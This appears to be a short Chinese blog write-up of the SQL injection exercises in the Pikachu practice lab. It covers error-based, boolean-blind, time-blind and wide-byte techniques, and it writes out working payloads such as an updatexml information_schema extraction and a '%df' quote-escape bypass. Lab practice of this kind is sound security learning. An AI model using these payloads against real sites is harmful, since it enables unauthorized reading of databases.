pikachu的sql注入
数字型注入(post)
burp抓包
成功
字符型注入(get)
直接注入
成功注入。
搜索型注入
使用同样的方法也能同样注入成功
xx型注入
需要闭合
加)之后注入成功。
insert/updata 注入
a‘ or updatexml(1,concat(0x7e, (select column_name from information_schema.columns where table_name=‘member‘ limit 1,1)), 0) or ‘
burp抓包修改
注入成功。
delete 注入
注入成功
http header注入
注入成功
盲注 base on boolian
kobe‘ and length(database())>5# 。。。 kobe‘ and length(database())=7#
kobe‘ and ascii(substr(database(), 1, 1)) > 105#慢慢盲注,只能挨个试。。
盲注(based on time)
同样的也是挨个试,这次看对错是看这个反应时间,要是可以的话就会五秒多一些。
宽字节注入
刚开始尝试发现注入不行,抓包发现以及进行了编码
在抓包后修改也不行
发现‘被后台转移,所以构造payload kobe%df‘ or 1=1#
注入成功
相关推荐
ALiDan 2020-07-27
qshpeng 2020-07-26
世樹 2020-07-17
chenjiazhu 2020-07-08
一对儿程序猿 2020-07-04
明月清风精进不止 2020-06-13
godfather 2020-06-13
ItBJLan 2020-06-11
tanrong 2020-06-11
ALiDan 2020-06-11
码墨 2020-06-09
世樹 2020-06-05
lt云飞扬gt 2020-06-03
godfather 2020-06-03
qshpeng 2020-05-11
明月清风精进不止 2020-05-07
gwn00 2020-05-07